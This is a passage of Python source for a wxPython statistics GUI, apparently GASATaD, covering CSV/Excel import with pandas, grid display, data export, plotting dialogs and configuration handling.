def selectCSV(self, additionalFile):
openFileInterf = OpenCSVFile(self, -1, additionalFile=additionalFile, dirfrom=self.params['options']['dirfrom'])
def selectXLS(self, additionalFile):
openFileInterf = OpenXLSFile(self, -1, additionalFile=additionalFile, dirfrom=self.params['options']['dirfrom'])
def OpenAddCSV(self, openFileOptions):
# print "Gonna open CSV file"
# print openFileOptions
self.params['options']['dirfrom'] = openFileOptions['dirName']
readCorrect = True
self.data = None
discardCol = openFileOptions['discardFirstCol']
sepChar = ''
if openFileOptions['sepchar'] == "Comma":
sepChar = ','
elif openFileOptions['sepchar'] == "Semicolon":
sepChar = ';'
elif openFileOptions['sepchar'] == "Tab":
sepChar = '\t'
try:
self.data = read_csv(os.path.join(openFileOptions['dirName'], openFileOptions['fileName']), sep=sepChar,
header=0,
engine='python', encoding='utf-8')
except:
# print "Error: ", sys.exc_info()
type, value, traceback = sys.exc_info()
self.dlg = wx.MessageDialog(None, "Error reading file " + openFileOptions['fileName'] + "\n" + str(value),
"File error", wx.OK | wx.ICON_EXCLAMATION)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
readCorrect = False
if readCorrect:
if discardCol:
self.data.drop(self.data.columns[[0]], axis=1, inplace=True)
self.data.rename(columns={'Unnamed: 0': 'NoTag'}, inplace=True)
if openFileOptions['additionalFile'] and readCorrect and (
self.m_dataTable.GetNumberRows() != len(self.data.index)):
self.dlg = wx.MessageDialog(None,
"Number of rows does not match: \n Loaded data has " + str(
self.m_dataTable.GetNumberRows()) + " rows \n File " + openFileOptions[
'fileName'] + " has " + str(
len(self.data.index)) + " rows ", "File error",
wx.OK | wx.ICON_EXCLAMATION)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
readCorrect = False
if readCorrect:
if openFileOptions['additionalFile']:
self.controller.storeData()
self.m_undo.SetText("Undo add file")
self.m_undo.Enable()
self.controller.OpenAdditionalFile(self.data)
else:
self.controller.OpenFile(self.data)
self.refreshGUI()
if self.controller.nullValuesInFile(self.data):
                self.dlg = wx.MessageDialog(None, "File " + openFileOptions['fileName'] + " has one or more missing values",
"Missing values", wx.OK | wx.ICON_WARNING)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
if openFileOptions['additionalFile']:
# Move the view of the table to the last column
self.m_dataTable.SetGridCursor(0, self.controller.getNumberOfColumns() - 1)
self.m_dataTable.MakeCellVisible(0, self.controller.getNumberOfColumns() - 1)
def OpenAddXLS(self, openFileOptions):
# print "File to load: ", openFileOptions['fileName']
self.params['options']['dirfrom'] = openFileOptions['dirName']
readCorrect = True
self.data = None
rowColNames = openFileOptions['rowColNames']
noColsDiscard = openFileOptions['noColsDiscard']
sheetNumber = openFileOptions['sheetNumber']
# print "Reading col names from row: ", rowColNames
try:
self.data = read_excel(os.path.join(openFileOptions['dirName'], openFileOptions['fileName']),
sheet_name=sheetNumber, header=rowColNames,
index_col=None)
if noColsDiscard != 0:
self.data.drop(self.data.columns[range(noColsDiscard)], axis=1, inplace=True)
# self.data = self.preprocessExcel(self.data)
except:
# print "Error: ", sys.exc_info()
type, value, traceback = sys.exc_info()
self.dlg = wx.MessageDialog(None, "Error reading file " + openFileOptions['fileName'] + "\n" + str(value),
"File error", wx.OK | wx.ICON_EXCLAMATION)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
readCorrect = False
if readCorrect:
self.data.rename(columns={'Unnamed: 0': 'NoTag'}, inplace=True)
if openFileOptions['additionalFile'] and readCorrect and (
self.m_dataTable.GetNumberRows() != len(self.data.index)):
self.dlg = wx.MessageDialog(None,
"Number of rows does not match: \n Loaded data has " + str(
self.m_dataTable.GetNumberRows()) + " rows \n File " + openFileOptions[
'fileName'] + " has " + str(
len(self.data.index)) + " rows ", "File error",
wx.OK | wx.ICON_EXCLAMATION)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
readCorrect = False
if readCorrect:
if openFileOptions['additionalFile']:
self.controller.storeData()
self.m_undo.SetText("Undo add file")
self.m_undo.Enable()
self.controller.OpenAdditionalFile(self.data)
else:
self.controller.OpenFile(self.data)
self.refreshGUI()
if self.controller.nullValuesInFile(self.data):
self.dlg = wx.MessageDialog(None,
"File " + openFileOptions['fileName'] + " has one or more missing values",
"Missing values", wx.OK | wx.ICON_WARNING)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
if openFileOptions['additionalFile']:
# Move the view of the table to the last column
self.m_dataTable.SetGridCursor(0, self.controller.getNumberOfColumns() - 1)
self.m_dataTable.MakeCellVisible(0, self.controller.getNumberOfColumns() - 1)
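    # Note: currently unused (its call in OpenAddXLS is commented out). Cleans
    # Excel data: whitespace-only strings become NaN, ints become floats,
    # all-blank rows are dropped and all-numeric columns are cast to float64.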
def preprocessExcel(self, data):
for row in range(len(data.index)):
for col in range(len(data.columns)):
                if type(data.iloc[row, col]) == str:
if data.iloc[row, col].isspace():
data.iloc[row, col] = numpy.nan
if type(data.iloc[row, col]) == int:
data.iloc[row, col] = float(data.iloc[row, col])
data.dropna(axis=0, how='all', inplace=True)
for col in data.columns:
            allNumbers = True
            for row in data.index:
                if not isinstance(data.loc[row, col], (int, float)):
                    allNumbers = False
if allNumbers:
data[col] = data[col].astype(numpy.float64)
return data
def adaptSizeOfGrid(self):
'''
        This function adjusts the number of grid rows and columns to match the dataframe
'''
numColsDataframe = self.controller.getNumberOfColumns()
numRowsDataframe = self.controller.getNumberOfRows()
numColsGrid = self.m_dataTable.GetNumberCols()
numRowsGrid = self.m_dataTable.GetNumberRows()
if numColsDataframe < numColsGrid:
self.m_dataTable.DeleteCols(0, (numColsGrid - numColsDataframe))
else:
self.m_dataTable.AppendCols((numColsDataframe - numColsGrid))
if numRowsDataframe < numRowsGrid:
self.m_dataTable.DeleteRows(0, (numRowsGrid - numRowsDataframe))
else:
self.m_dataTable.AppendRows((numRowsDataframe - numRowsGrid))
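    # Copy the pandas dataframe into the wx grid, formatting numbers with
    # '{:5g}' and writing "nan" for missing values.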
def fillInGrid(self):
colLabels = self.controller.getLabelsOfColumns()
numRows = self.controller.getNumberOfRows()
numCols = self.controller.getNumberOfColumns()
dataToAnalyse = self.controller.getDataToAnalyse()
self.adaptSizeOfGrid()
for i in range(len(colLabels)):
self.m_dataTable.SetColLabelValue(i, colLabels[i])
for row in range(numRows):
for col in range(numCols):
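                # NaN is the only value that compares unequal to itself, so
                # this test detects missing cells without extra imports.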
                if dataToAnalyse.iloc[row, col] != dataToAnalyse.iloc[row, col]:
                    self.m_dataTable.SetCellValue(row, col, "nan")
                elif type(dataToAnalyse.iloc[row, col]) == float:
                    dataToAnalyse.iloc[row, col] = numpy.float64(dataToAnalyse.iloc[row, col])
                    self.m_dataTable.SetCellValue(row, col, '{:5g}'.format(dataToAnalyse.iloc[row, col]))
                elif type(dataToAnalyse.iloc[row, col]) in (int, complex, numpy.float64, numpy.int64):
                    self.m_dataTable.SetCellValue(row, col, '{:5g}'.format(dataToAnalyse.iloc[row, col]))
                else:
                    self.m_dataTable.SetCellValue(row, col, dataToAnalyse.iloc[row, col])
self.controller.detectColumnTypes()
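    # Colour-code the grid: null cells get a peach background (and are counted),
    # text columns pale yellow, integer columns pale cyan, float columns white.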
def markNans(self):
# print "# Going to mark nans"
numRows = self.controller.getNumberOfRows()
numCols = self.controller.getNumberOfColumns()
self.params['noOfNulls'] = 0
for row in range(numRows):
for col in range(numCols):
content = self.m_dataTable.GetCellValue(row, col)
if content == 'nan' or content == 'null' or content.lower() == "no data": # This checks for nan
# print "# Nan detected in cell:",row," ",col
self.m_dataTable.SetCellValue(row, col, "null")
# self.m_dataTable.SetCellBackgroundColour(row,col,'peachpuff')
self.m_dataTable.SetCellBackgroundColour(row, col, wx.Colour(255, 218, 185))
self.params['noOfNulls'] += 1
else:
if self.m_dataTable.GetColLabelValue(col) in self.controller.characterValues:
self.m_dataTable.SetCellBackgroundColour(row, col, wx.Colour(250, 250, 210))
elif self.m_dataTable.GetColLabelValue(col) in self.controller.integerValues:
self.m_dataTable.SetCellBackgroundColour(row, col, wx.Colour(240, 255, 255))
else:
self.m_dataTable.SetCellBackgroundColour(row, col, 'white')
def saveFile(self, event):
askfile = AskFileType(self, -1, "save")
askfile.CenterOnScreen()
askfile.ShowModal()
askfile.Destroy()
def saveToCSV(self):
self.fileExtensions = "CSV files (*.csv)|*.csv;*.CSV|All files (*.*)|*.*"
saveFile = wx.FileDialog(self, message='Save file', defaultDir=self.params['options']['dirfrom'],
defaultFile='untitled.csv', wildcard=self.fileExtensions,
style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
if saveFile.ShowModal() == wx.ID_OK:
self.filename = saveFile.GetFilename()
self.directory = saveFile.GetDirectory()
fileExtension = self.filename.rpartition(".")[-1]
if fileExtension.lower() != "csv":
self.dlg = wx.MessageDialog(None,
"Error exporting file " + self.filename + "\nFile extension (.csv) is required",
"File error", wx.OK | wx.ICON_EXCLAMATION)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
else:
path = os.path.join(self.directory, self.filename)
exportCsv = ExportCsvOptions(self)
if exportCsv.ShowModal() == wx.ID_OK:
try:
self.controller.exportDataCSV(path, exportCsv.getSelectedExportOptions())
except:
self.dlg = wx.MessageDialog(None, "Error saving to file " + self.filename,
"File error", wx.OK | wx.ICON_EXCLAMATION)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
return
dlg = wx.MessageDialog(None, "Data saved to file: " + self.filename, "File operation",
wx.OK | wx.ICON_INFORMATION)
self.params['options']['dirfrom'] = self.directory
if dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
def saveToXLS(self):
self.fileExtensions = "Excel files (*.xls;*.xlsx)|*.xls;*.xlsx;*.XLS;*.XLSX|All files (*.*)|*.*"
saveFile = wx.FileDialog(self, message='Save file', defaultDir=self.params['options']['dirfrom'],
defaultFile='untitled.xlsx',
wildcard=self.fileExtensions, style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
if saveFile.ShowModal() == wx.ID_OK:
self.filename = saveFile.GetFilename()
self.directory = saveFile.GetDirectory()
fileExtension = self.filename.rpartition(".")[-1]
if fileExtension.lower() not in ["xls", "xlsx"]:
self.dlg = wx.MessageDialog(None,
"Error exporting file " + self.filename + "\nFile extension (.xls|.xlsx) is required",
"File error", wx.OK | wx.ICON_EXCLAMATION)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
else:
path = os.path.join(self.directory, self.filename)
try:
self.controller.exportDataExcel(path)
except:
self.dlg = wx.MessageDialog(None, "Error saving to file " + self.filename,
"File error", wx.OK | wx.ICON_EXCLAMATION)
if self.dlg.ShowModal() == wx.ID_OK:
self.dlg.Destroy()
return
dlg = wx.MessageDialog(None, "Data saved to file: " + self.filename, "File operation",
wx.OK | wx.ICON_INFORMATION)
self.params['options']['dirfrom'] = self.directory
if dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
def resetData(self, event):
self.controller.storeData()
self.m_undo.SetText("Undo close data")
self.m_undo.Enable()
self.controller.resetDataToAnalyse()
self.refreshGUI()
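    # Central GUI refresh: repopulate and recolour the grid and toggle every
    # button and menu entry depending on whether data is currently loaded.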
def refreshGUI(self, updateDataInfo=True, markNans=True):
# Reset plots options
self.histogramOptions = {}
self.scatterPlotOptions = {}
self.boxPlotOptions = {}
self.pieChartOptions = {}
self.barChartOptions = {}
if not self.controller.programState.dataToAnalyse.empty: # data present
self.fillInGrid() # Fills wxgrid from the data of the pandas dataframe
self.m_dataTable.AutoSize()
lastColumnOrigSize = self.m_dataTable.GetColSize(self.controller.getNumberOfColumns() - 1)
self.m_dataTable.SetColSize(self.controller.getNumberOfColumns() - 1, lastColumnOrigSize + 30)
self.m_dataTable.ClearSelection()
if markNans:
self.markNans()
if updateDataInfo:
self.updateDataInfo()
self.Layout()
self.m_dataTable.Enable(True)
self.m_dataTable.SetFocus()
# Graphs
self.histogramBtn.Enable(True)
self.scatterPlotBtn.Enable(True)
self.pieChartBtn.Enable(True)
self.boxPlotBtn.Enable(True)
self.barChartBtn.Enable(True)
# Buttons
self.openNewFileBtn.Enable(False)
self.addFileBtn.Enable(True)
self.resetDataBtn.Enable(True)
self.exportDataBtn.Enable(True)
self.descriptiveStatsBtn.Enable(True)
self.significanceTestBtn.Enable(True)
# Menus
self.m_menuNewFile.Enable(False)
self.m_menuAddFile.Enable(True)
self.m_menuResetData.Enable(True)
self.m_menuExportData.Enable(True)
self.m_addNewColumn.Enable(True)
self.m_deleteColumns.Enable(True)
else: # no data
self.fillInGrid()
self.m_dataTable.AppendRows(45)
self.m_dataTable.AppendCols(45)
self.m_dataTable.Enable(False)
# Graphs
self.histogramBtn.Enable(False)
self.scatterPlotBtn.Enable(False)
self.pieChartBtn.Enable(False)
self.boxPlotBtn.Enable(False)
self.barChartBtn.Enable(False)
# Buttons
self.openNewFileBtn.Enable(True)
self.addFileBtn.Enable(False)
self.resetDataBtn.Enable(False)
self.exportDataBtn.Enable(False)
self.descriptiveStatsBtn.Enable(False)
self.significanceTestBtn.Enable(False)
# Menus
self.m_menuNewFile.Enable(True)
self.m_menuAddFile.Enable(False)
self.m_menuResetData.Enable(False)
self.m_menuExportData.Enable(False)
self.m_addNewColumn.Enable(False)
self.m_deleteColumns.Enable(False)
self.updateDataInfo()
self.m_dataTable.SetColLabelSize(30)
self.m_dataTable.SetRowLabelSize(80)
self.Layout()
def deleteColumnsByLabels(self, event):
selectedColumnsInterface = DeleteColumnsInterface(self,
list(self.controller.programState.dataToAnalyse.columns))
if selectedColumnsInterface.ShowModal() == wx.ID_OK:
self.controller.storeData()
self.m_undo.SetText("Undo delete columns")
self.m_undo.Enable()
listOfColumns = selectedColumnsInterface.getSelectedColumns()
self.controller.deleteColumns(listOfColumns)
self.refreshGUI()
# if self.controller.programState.dataToAnalyse.empty:
# self.resetData(None)
# else:
# self.refreshGUI()
def createNewColumn(self, event):
if (len(self.controller.integerValues + self.controller.floatValues) != 0):
            # Minimum and maximum used when the spin controls are created
minimum = int(self.controller.programState.dataToAnalyse.min(numeric_only=True).min().round()) - 1
maximum = int(self.controller.programState.dataToAnalyse.max(numeric_only=True).max().round()) + 1
factorFrame = AddColumnInterface(self, (self.controller.integerValues + self.controller.floatValues),
list(self.controller.programState.dataToAnalyse.columns), minimum, maximum)
factorFrame.Show(True)
if factorFrame.ShowModal() == wx.ID_OK:
self.controller.storeData()
self.m_undo.SetText("Undo add new column")
self.m_undo.Enable()
factorsFromInterface, self.selectedRadioButton, tagRestValues, nameOfFactor = factorFrame.returnFactors()
self.controller.addColumn(factorsFromInterface, self.selectedRadioButton, tagRestValues, nameOfFactor)
self.refreshGUI()
numCols = self.controller.getNumberOfColumns()
self.m_dataTable.SetGridCursor(0, numCols - 1)
self.m_dataTable.MakeCellVisible(0, numCols - 1)
self.m_dataTable.SelectCol(numCols - 1)
else:
wx.MessageBox("There are no numerical values", "ERROR")
def createBasicStatisticsInterface(self, event):
if (len(self.controller.integerValues + self.controller.floatValues) != 0):
self.tagsAndValues.clear()
for value in self.controller.characterValues:
listTags = list(self.controller.programState.dataToAnalyse[value].unique())
# listTags = [x for x in listTags if unicode(x).encode('utf-8') != 'nan']
listTags = [x for x in listTags if str(x) != 'nan']
self.tagsAndValues[value] = numpy.asarray(listTags)
# self.tagsAndValues[value] = self.controller.programState.dataToAnalyse[str(value)].unique()
dataFrame = self.controller.programState.dataToAnalyse
variablesList = self.controller.floatValues + self.controller.integerValues
minimum = int(self.controller.programState.dataToAnalyse.min(numeric_only=True).min().round()) - 1
maximum = int(self.controller.programState.dataToAnalyse.max(numeric_only=True).max().round()) + 1
basicStatsInterface = BasicStatisticsInterface(self, variablesList, self.tagsAndValues,
self.controller.integerValues, dataFrame)
if basicStatsInterface.ShowModal() == wx.ID_CLOSE:
basicStatsInterface.Destroy()
else:
wx.MessageBox("There are no numerical values in the data", "ERROR", wx.OK | wx.ICON_EXCLAMATION)
def doSignificanceTest(self, event):
if (len(self.controller.integerValues + self.controller.floatValues) != 0):
self.tagsAndValues.clear()
for value in self.controller.characterValues:
listTags = list(self.controller.programState.dataToAnalyse[value].unique())
listTags = [x for x in listTags if str(x) != 'nan']
# listTags = [x for x in listTags if unicode(x).encode('utf-8') != 'nan']
self.tagsAndValues[value] = numpy.asarray(listTags)
# self.tagsAndValues[value] = self.controller.programState.dataToAnalyse[str(value)].unique()
dataFrame = self.controller.programState.dataToAnalyse
variablesList = self.controller.floatValues + self.controller.integerValues
significanceTestFrame = SignificanceTestInterface(self, variablesList, self.tagsAndValues,
self.controller.integerValues, dataFrame)
significanceTestFrame.Show()
if significanceTestFrame.ShowModal() == wx.ID_CANCEL:
significanceTestFrame.Destroy()
else:
wx.MessageBox("There are no numerical values", "ERROR")
def createHistogram(self, event):
if (len(self.controller.integerValues + self.controller.floatValues) != 0):
histogramFrame = HistogramInterface(self, self.controller.floatValues + self.controller.integerValues,
self.controller.characterValues, self.histogramOptions)
if histogramFrame.ShowModal() == wx.ID_OK:
self.histogramOptions = histogramFrame.getHistogramOptions()
self.controller.createHistogram(self.histogramOptions)
else:
wx.MessageBox("There are no numerical values", "ERROR")
def createScatterPlot(self, event):
if (len(self.controller.integerValues + self.controller.floatValues) != 0):
scatterFrame = ScatterPlotInterface(self, self.controller.floatValues + self.controller.integerValues,
self.scatterPlotOptions)
if scatterFrame.ShowModal() == wx.ID_OK:
self.scatterPlotOptions = scatterFrame.getScatterPlotOptions()
self.controller.createScatterPlot(self.scatterPlotOptions)
else:
wx.MessageBox("There are no numerical values", "Attention")
def createPieChart(self, event):
if (len(self.controller.characterValues) != 0):
pieChartFrame = PieChartInterface(self, self.controller.characterValues, self.pieChartOptions)
if pieChartFrame.ShowModal() == wx.ID_OK:
self.pieChartOptions = pieChartFrame.getPieChartOptions()
self.controller.createPieChart(self.pieChartOptions)
else:
wx.MessageBox("There are no categorical variables", "ERROR")
def createBoxPlot(self, event):
if (len(self.controller.integerValues + self.controller.floatValues) != 0):
boxPlotFrame = BoxPlotInterface(self, self.controller.floatValues + self.controller.integerValues,
self.controller.characterValues, self.boxPlotOptions)
if boxPlotFrame.ShowModal() == wx.ID_OK:
self.boxPlotOptions = boxPlotFrame.getBoxPlotOptions()
self.controller.createBoxPlot(self.boxPlotOptions)
else:
wx.MessageBox("There are no numerical variables", "ERROR")
def createBarChart(self, event):
if (len(self.controller.integerValues + self.controller.floatValues) != 0):
barChartFrame = BarChartInterface(self, self.controller.floatValues + self.controller.integerValues,
self.controller.characterValues, self.barChartOptions)
if barChartFrame.ShowModal() == wx.ID_OK:
self.barChartOptions = barChartFrame.getBarChartOptions()
self.controller.createBarChart(self.barChartOptions)
else:
wx.MessageBox("There are no numerical variables", "ERROR")
def showWarning(self):
dlg = wx.MessageDialog(None, "Lower limit must be smaller than the upper limit", "Be careful!",
wx.OK | wx.ICON_EXCLAMATION)
if dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
def informationAboutNullValues(self):
dlg = wx.MessageDialog(None, "There are null values in this File", "Null Values", wx.OK | wx.ICON_INFORMATION)
if dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
def appInformation(self, event):
description = u'Graphical Application for Statistical Analysis of TAbulated Data\n\nDaniel Pereira Alonso\nLeandro Rodr\u00EDguez Liñares\nMar\u00EDa Jos\u00E9 Lado Touriño'
info = wx.adv.AboutDialogInfo()
info.SetName('GASATaD')
info.SetVersion(str(self.params['version']))
info.SetDescription(description)
        info.SetCopyright(u"\u00A9 2019")
info.SetIcon(wx.Icon(os.path.dirname(os.path.abspath(__file__)) + "/GasatadLogo.ico", wx.BITMAP_TYPE_ICO))
info.SetWebSite("https://milegroup.github.io/gasatad/")
wx.adv.AboutBox(info)
def closeApp(self, event):
emptyData = False
try:
emptyData = self.controller.programState.dataToAnalyse.empty
except:
emptyData = True
if not emptyData:
dlg = wx.MessageDialog(self, "Do you really want to close GASATaD?", "Confirm Exit",
wx.OK | wx.CANCEL | wx.ICON_QUESTION | wx.CANCEL_DEFAULT)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_OK:
self.configSave()
self.Destroy()
else:
self.configSave()
self.Destroy()
def configInit(self):
"""If config dir and file does not exist, it is created
If config file exists, it is loaded"""
# print "Intializing configuration"
if not os.path.exists(self.params['configDir']):
# print "Directory does not exists ... creating"
os.makedirs(self.params['configDir'])
if os.path.exists(self.params['configFile']):
# print "Loading config"
self.configLoad()
else:
# print "Saving config"
self.configSave()
def configSave(self):
""" Saves configuration file"""
try:
# from ConfigParser import SafeConfigParser
# options = SafeConfigParser()
import configparser
options = configparser.ConfigParser()
options.add_section('gasatad')
for param in self.params['options'].keys():
                # On Windows, if the path contains non-ASCII characters, it is not saved in the configuration file
validParam = True
if param == "dirfrom" and sys.platform == "win32":
tmpStr = self.params['options'][param]
if any(ord(char) > 126 for char in tmpStr):
validParam = False
if validParam:
options.set('gasatad', param, self.params['options'][param])
# print " ",param," - ",self.params['options'][param]
tempF = open(self.params['configFile'], 'w')
# print("Trying to write configuration in ", self.params['configFile'])
options.write(tempF)
tempF.close()
if platform == "win32":
import win32api, win32con
win32api.SetFileAttributes(self.params['configDir'], win32con.FILE_ATTRIBUTE_HIDDEN)
except:
return
def configLoad(self):
""" Loads configuration file"""
# print "Loading file",self.params['configFile']
try:
import configparser
options = configparser.ConfigParser()
options.read(self.params['configFile'])
for section in options.sections():
for param, value in options.items(section):
self.params['options'][param] = value
# print "param",param," - value",value
except:
# print "Problem loading configuration file", self.params['configFile']
try:
os.remove(self.params['configFile'])
except:
pass
return
class ReplaceInColInterface(wx.Dialog):
def __init__(self, parent, listOfTags):
wx.Dialog.__init__(self, parent, id=wx.ID_ANY, title="Replace in column", size=wx.DefaultSize,
pos=wx.DefaultPosition)
mainSizer = wx.BoxSizer(wx.VERTICAL)
topSizer = wx.BoxSizer(wx.HORIZONTAL)
leftSizer = wx.BoxSizer(wx.VERTICAL)
leftSizer.Add(wx.StaticText(self, -1, "Old value:"))
self.cb = wx.ComboBox(self, choices=listOfTags, value=listOfTags[0], size=(160, -1))
leftSizer.Add(self.cb, 0, wx.TOP | wx.LEFT, 5)
topSizer.Add(leftSizer, 0, wx.ALL, 10)
rightSizer = wx.BoxSizer(wx.VERTICAL)
rightSizer.Add(wx.StaticText(self, -1, "New value (empty for 'null'):"))
self.tc = wx.TextCtrl(self, size=(160, -1))
rightSizer.Add(self.tc, 0, wx.TOP | wx.LEFT | wx.EXPAND, 5)
topSizer.Add(rightSizer, 0, wx.ALL, 10)
mainSizer.Add(topSizer)
# Ok and Cancel buttons
okay = wx.Button(self, wx.ID_OK)
cancel = wx.Button(self, wx.ID_CANCEL)
btns = wx.StdDialogButtonSizer()
btns.AddButton(okay)
btns.AddButton(cancel)
btns.Realize()
mainSizer.Add(btns, 0, wx.BOTTOM | wx.ALIGN_RIGHT, 10)
mainSizer.Fit(self)
self.SetSizer(mainSizer)
self.Layout()
self.Fit()
self.Centre(wx.BOTH)
self.Show(True)
def getValues(self):
return self.cb.GetValue(), self.tc.GetValue()
class DeleteColumnsInterface(wx.Dialog):
def __init__(self, parent, listOfColumns):
        # The dictionary is initialized -> Key = name of column; value = False (because no checkbox is selected yet)
self.selectedColumns = dict.fromkeys(listOfColumns, False)
wx.Dialog.__init__(self, parent, id=wx.ID_ANY, title="Delete columns", pos=wx.DefaultPosition,
size=wx.DefaultSize, style=wx.DEFAULT_FRAME_STYLE | wx.TAB_TRAVERSAL)
gbSizer1 = wx.GridBagSizer(0, 0)
gbSizer1.SetFlexibleDirection(wx.BOTH)
gbSizer1.SetNonFlexibleGrowMode(wx.FLEX_GROWMODE_SPECIFIED)
# Sizer where the names of the columns are placed
fgSizerCheckBoxColumns = wx.FlexGridSizer(0, 4, 0, 0)
fgSizerCheckBoxColumns.SetFlexibleDirection(wx.BOTH)
fgSizerCheckBoxColumns.SetNonFlexibleGrowMode(wx.FLEX_GROWMODE_SPECIFIED)
fgSizerCheckBoxColumns.AddGrowableCol(1)
for column in listOfColumns:
self.m_checkBox = wx.CheckBox(self, wx.ID_ANY, str(column), wx.DefaultPosition, wx.DefaultSize, 0)
fgSizerCheckBoxColumns.Add(self.m_checkBox, 0, wx.EXPAND | wx.ALL, 5)
self.Bind(wx.EVT_CHECKBOX, self.changeValueCheckBox, self.m_checkBox)
gbSizer1.Add(fgSizerCheckBoxColumns, wx.GBPosition(0, 0), wx.GBSpan(1, 1), wx.ALIGN_RIGHT | wx.EXPAND | wx.ALL,
5)
# Ok and Cancel buttons
okay = wx.Button(self, wx.ID_OK)
cancel = wx.Button(self, wx.ID_CANCEL)
btns = wx.StdDialogButtonSizer()
btns.AddButton(okay)
btns.AddButton(cancel)
btns.Realize()
gbSizer1.Add(btns, wx.GBPosition(1, 0), wx.GBSpan(1, 1), wx.BOTTOM | wx.ALIGN_RIGHT, 10)
self.SetSizer(gbSizer1)
gbSizer1.Fit(self)
self.Layout()
self.Fit()
self.Centre(wx.BOTH)
self.Show(True)
def changeValueCheckBox(self, event):
checkBox = event.GetEventObject()
if checkBox.IsChecked():
self.selectedColumns[checkBox.GetLabel()] = True
else:
self.selectedColumns[checkBox.GetLabel()] = False
def getSelectedColumns(self):
listSelectedColumns = []
for key in self.selectedColumns.keys():
if self.selectedColumns[key]:
listSelectedColumns.append(key)
return listSelectedColumns
class ExportCsvOptions(wx.Dialog):
def __init__(self, parent):
self.exportOptions = OptionsInExportInterface()
wx.Dialog.__init__(self, parent, id=wx.ID_ANY, title="Export csv", pos=wx.DefaultPosition, size=wx.DefaultSize,
style=wx.DEFAULT_FRAME_STYLE | wx.TAB_TRAVERSAL)
self.SetSizeHints(wx.DefaultSize, wx.DefaultSize)
gbSizer1 = wx.GridBagSizer(0, 0)
gbSizer1.SetFlexibleDirection(wx.BOTH)
gbSizer1.SetNonFlexibleGrowMode(wx.FLEX_GROWMODE_SPECIFIED)
# Sizer for the options
fgSizerExportOptions = wx.FlexGridSizer(0, 2, 0, 0)
fgSizerExportOptions.SetFlexibleDirection(wx.BOTH)
fgSizerExportOptions.SetNonFlexibleGrowMode(wx.FLEX_GROWMODE_SPECIFIED)
fgSizerExportOptions.AddGrowableCol(1)
self.characterSet = wx.StaticText(self, wx.ID_ANY, u"Character set:", wx.DefaultPosition, wx.DefaultSize, 0)
self.characterSet.Wrap(-1)
fgSizerExportOptions.Add(self.characterSet, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
m_comboBox3Choices = ["UTF-8", "ASCII", "Latin_1"]
self.m_comboBox3 = wx.ComboBox(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
m_comboBox3Choices, wx.CB_READONLY)
self.m_comboBox3.SetSelection(0)
self.Bind(wx.EVT_COMBOBOX, self.setCharacterSetValue, self.m_comboBox3)
fgSizerExportOptions.Add(self.m_comboBox3, 0, wx.ALL | wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, 5)
self.xAxisName = wx.StaticText(self, wx.ID_ANY, u"Field delimiter:", wx.DefaultPosition, wx.DefaultSize, 0)
self.xAxisName.Wrap(-1)
fgSizerExportOptions.Add(self.xAxisName, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
m_comboBox3Choices = [",", ";", ":", "{Tab}", "{Space}"]
self.m_comboBox3 = wx.ComboBox(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
m_comboBox3Choices, wx.CB_READONLY)
self.m_comboBox3.SetSelection(0)
self.Bind(wx.EVT_COMBOBOX, self.setFieldDelimiterValue, self.m_comboBox3)
fgSizerExportOptions.Add(self.m_comboBox3, 0, wx.ALL | wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, 5)
self.yAxisName = wx.StaticText(self, wx.ID_ANY, u"Decimal separator:", wx.DefaultPosition, wx.DefaultSize, 0)
self.yAxisName.Wrap(-1)
fgSizerExportOptions.Add(self.yAxisName, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
m_comboBox3Choices = [".", ","]
self.m_comboBox3 = wx.ComboBox(self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize,
m_comboBox3Choices, wx.CB_READONLY)
self.m_comboBox3.SetSelection(0)
self.Bind(wx.EVT_COMBOBOX, self.setDecimalSeparatorValue, self.m_comboBox3)
fgSizerExportOptions.Add(self.m_comboBox3, 0, wx.ALL | wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, 5)
gbSizer1.Add(fgSizerExportOptions, wx.GBPosition(0, 0), wx.GBSpan(1, 1), wx.EXPAND | wx.ALL, 5)
# Additional options
AdditionalOptSizer = wx.StaticBoxSizer(wx.StaticBox(self, wx.ID_ANY, u"Additional options"), wx.HORIZONTAL)
self.wColumnNames = wx.CheckBox(self, wx.ID_ANY, "Write column names", wx.DefaultPosition, wx.DefaultSize, 0)
AdditionalOptSizer.Add(self.wColumnNames, 0, wx.ALL, 10)
self.wColumnNames.SetValue(True)
self.Bind(wx.EVT_CHECKBOX, self.setWriteColumnNameValue, self.wColumnNames)
self.wRowNames = wx.CheckBox(self, wx.ID_ANY, "Write row names (Index)", wx.DefaultPosition, wx.DefaultSize, 0)
AdditionalOptSizer.Add(self.wRowNames, 0, wx.ALL, 10)
self.wRowNames.SetValue(True)
self.Bind(wx.EVT_CHECKBOX, self.setWriteRowNames, self.wRowNames)
gbSizer1.Add(AdditionalOptSizer, wx.GBPosition(1, 0), wx.GBSpan(1, 1), wx.ALL, 20)
# Ok and Cancel buttons
okay = wx.Button(self, wx.ID_OK)
cancel = wx.Button(self, wx.ID_CANCEL)
btns = wx.StdDialogButtonSizer()
btns.AddButton(okay)
btns.AddButton(cancel)
btns.Realize()
